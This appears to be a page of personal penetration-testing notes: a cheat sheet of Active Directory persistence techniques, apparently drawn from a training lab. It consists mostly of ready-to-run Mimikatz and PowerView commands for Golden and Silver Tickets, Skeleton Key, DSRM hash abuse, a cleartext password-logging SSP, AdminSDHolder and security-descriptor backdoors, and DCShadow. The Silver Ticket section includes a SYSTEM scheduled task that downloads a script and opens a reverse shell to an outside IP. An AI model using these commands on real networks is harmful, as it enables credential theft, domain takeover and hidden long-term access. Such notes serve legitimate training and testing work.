Persistance

Golden Ticket

1
# Run as DA locally on DC to get krbtgt hash:
2
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
3
4
# Run Remotely as DA to get krbtgt hash:
5
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
6
7
# Get Domain-SID:
8
Get-DomainSID
9
10
# Get Domain Ticket policy:
11
(Get-DomainPolicy)."kerberos.policy"
12
13
# Create ticket:
14
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /krbtgt:HASH id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
15
16
# Use ticket:
17
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
18
19
# Access
20
21
ls \\domain-dc\c$
22
23
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\Administrator /domain:DOMAIN"'
Copied!

Silver Ticket

1
# Using DC$ hash to provide access to domain shares on DC:
2
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN /sid:S-1-5-211874506631-3219952063-538504511 /target:DC.DOMAIN.local /service:CIFS /rc4:HASH /user:Administrator /ptt"'
3
4
# Create ticket for HOST (using DC$ hash) to allow us to schedule tasks on target:
5
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:HOST /rc4:HASH /user:Administrator /ptt"'
6
7
## Schedule task with above silver ticket
8
schtasks /create /S dc.DOMAIN.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User" /TR "powershell iex (iwr http://172.16.100.218/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.218 -Port 443"
9
schtasks /Run /S dc.DOMAIN.local /TN "User"
10
11
# To execute wmi need HOST and RPCSS
12
Invoke-Mimikatz -Command '"kerberos::golden /domain:DOMAIN.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dc.DOMAIN.local /service:RPCSS /rc4:HASH /user:Administrator /ptt"'
Copied!

Skeleton Key

1
# Creating skeleton key
2
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.DOMAIN.local
3
4
# Using Skeleton Key (Password is "mimikatz")
5
Enter-PSSession –Computername dc –credential DOMAIN\Administrator
Copied!

DSRM (Directory Services Restore Mode)

DSRM password is needed when setting up a DC and is the local administrator password. By making some reg changes, it is possible to use the DSRM hash in a PTH attack. Gives DA that is very unlikely to change.
1
# Dump DSRM passwords (requires DA):
2
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dc
3
4
# Change Reg:
5
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
6
7
# Pass the DSRM hash:
8
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc /user:Administrator /ntlm:HASH /run:powershell.exe"'
Copied!

Custom SSP

A Security Support Provider (SSP) is a DLL which provides ways for an application to obtain an authenticated connection. Some SSP Packages by Microsoft are NTLM, Kerberos, Wdigest, CredSSP. Mimikatz provides a custom SSP - mimilib.dll. This SSP logs local logons, service account and machine account passwords in clear text on the target server.
1
Drop the mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:
2
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
3
$packages += "mimilib"
4
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
5
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
6
7
# Using mimikatz, inject into lsass (Not stable with Server 2016):
8
Invoke-Mimikatz -Command '"misc::memssp"'
9
10
# All log ons are now logged in clear too:
11
C:\Windows\system32\kiwissp.log
Copied!

ACL Abuse - AdminSDHolder

Resides in the System container of a domain and used to control the permissions - using an ACL - for certain built-in privileged groups ( called Protected Groups). Propogates across AD every hour.
PowerView
ADModule
1
# Giving a user full rights over AdminSDHolder groups:
2
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights All -Verbose
3
4
# Giving user reset password rights:
5
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights ResetPassword -Verbose
6
7
# Giving user WriteMember privs:
8
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName student1 -Rights WriteMembers -Verbose
9
10
# Check Domain Admins permission as normal user:
11
Get-ObjectAcl -SamAccountName "Domain Admins" ResolveGUIDs | ?{$_.IdentityReference -match 'student1'}
12
13
# Abuse FullControl (powerview_dev):
14
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
15
16
# Abusing ResetPassword (powerview_dev):
17
Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "[email protected]" -AsPlainText Force) -Verbose
18
19
# Add DCSYNC rights to a user:
20
Add-ObjectAcl -TargetDistinguishedName 'DC=DOMAIN,DC=local' -PrincipalSamAccountName student1 -Rights DCSync -Verbose
Copied!
1
# Giving a user full rights over AdminSDHolder groups:
2
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,D C=local' -Principal student1 -Verbose
3
4
# Check Domain Admins permission as normal user:
5
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?{$_.IdentityReference -match 'student1'}
6
7
# Abuse FullControl:
8
Add-ADGroupMember -Identity 'Domain Admins' -Members testda
9
10
# Abusing ResetPassword:
11
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "[email protected]" -AsPlainText Force) -Verbose
12
13
# Add DCSYNC rights:
14
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal student1 -GUIDRight DCSync -Verbose
Copied!
1
# Run SDProp manually using Invoke-SDPropagator.ps1:
2
Invoke-SDPropagator -timeoutMinutes 1 -showProgress Verbose
3
4
# For pre-Server 2008 machines:
5
Invoke-SDPropagator -taskname FixUpInheritance timeoutMinutes 1 -showProgress -Verbose
Copied!

ACL Abuse - Security Descriptors

It is possible to modify Security Descriptors (security information like Owner, primary group, DACL and SACL) of multiple remote access methods (securable objects) to allow access to non-admin users. This is rarely checked.
WMI
PSRemote
Remote Registry
1
# On local machine for student1:
2
Set-RemoteWMI -UserName student1 -Verbose
3
4
# On remote machine for student1 without explicit credentials:
5
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
6
7
# On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:
8
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential Administrator –namespace 'root\cimv2' -Verbose
9
10
# On remote machine remove permissions:
11
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose
Copied!
1
# On local machine for student1:
2
Set-RemotePSRemoting -UserName student1 -Verbose
3
4
# On remote machine for student1 without credentials:
5
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Verbose
6
7
# On remote machine, remove the permissions:
8
Set-RemotePSRemoting -UserName student1 -ComputerName dcorp-dc -Remove
Copied!
1
# Using DAMP, with admin privs on remote machine:
2
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
3
4
# As student1, retrieve machine account hash:
5
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
6
7
# Retrieve local account hash:
8
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
9
10
# Retrieve domain cached credentials:
11
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
Copied!

DCShadow - Forest Persistance

Machine needs to be part of the parent domain. Can be changed in the system properties with admin access. Requires user to be a valid user for that domain too, so may need to add them first. Will require comp restart.
Requires 2 consoles. One as DA, one as SYSTEM. SYSTEM sets up the fake DC, DA pushes the replication.
1
# Setting up Fake DC
2
.\mimikatz.exe
3
mimikatz# !+
4
mimikatz# !processtoken
5
mimikatz# lsadump::dcshadow /object:targetuser /attribute:serviceprincipalname /value:uniquespn/DC1
6
7
# On DA terminal
8
mimikatz -command '"lsadump::dcshadow /push"'
Copied!
Allowing DCShadow to a user so they can do it without DA privs for persistance. Once done the user can run the /push terminal without DA. First terminal still needs SYSTEM privs.
1
Set-DCShadowPermissions -FakeDC USER -SAMAccountName USER -Username studentx -Verbose
Copied!
Last modified 1yr ago